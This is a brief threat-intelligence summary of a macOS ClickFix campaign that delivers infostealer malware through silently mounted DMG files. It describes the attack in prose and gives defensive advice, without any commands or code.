New macOS ClickFix attack silently mounts DMGs to push infostealer
Summary
A new macOS ClickFix campaign uses Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files. This attack targets macOS users by exploiting the trust in seemingly legitimate DMG files to deliver malware without requiring user interaction.
IFF Assessment
FOE
This article describes a new macOS attack campaign that silently installs infostealer malware, which is bad news for defenders.
Defender Context
macOS users should be wary of downloading and opening DMG files from untrusted sources, even if they appear legitimate. Defenders should monitor for unusual Terminal activity or unexpected file mounts, as this campaign highlights a sophisticated method of malware delivery.